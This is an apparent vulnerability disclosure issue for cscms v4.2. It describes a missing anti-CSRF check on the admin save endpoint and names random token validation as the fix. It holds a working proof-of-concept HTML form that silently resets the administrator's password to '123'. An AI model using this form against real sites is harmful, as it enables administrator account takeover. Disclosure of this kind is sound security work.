Open
Description
details
In cscms v4.2 A problem was found in 1
Cross-site request forgery (CSRF) vulnerability in /Cscms_4.2/upload/admin.php/sys/save allow remote attackers to change
administrator's username and password.
Trigger condition: the administrator clicks a malicious link
Cause of vulnerability:
We can find that this script has no anti CSRF mechanism.
Exploit:
Login administrator click URL: http://ip/csrf.html
csrf. html:
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://192.168.136.136/Cscms_4.2/upload/admin.php/sys/save" method="POST">
<input type="hidden" name="adminname" value="admin" />
<input type="hidden" name="adminpass" value="123" />#The password you want to change here is 123
<input type="hidden" name="sid" value="1" />
<input type="hidden" name="id" value="1" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>/Cscms_4.2/upload/admin.php/sys/save

administrator click
success

The password has been successfully changed to 123

Repair method:
Join the random token check
Metadata
Assignees
Labels
No labels
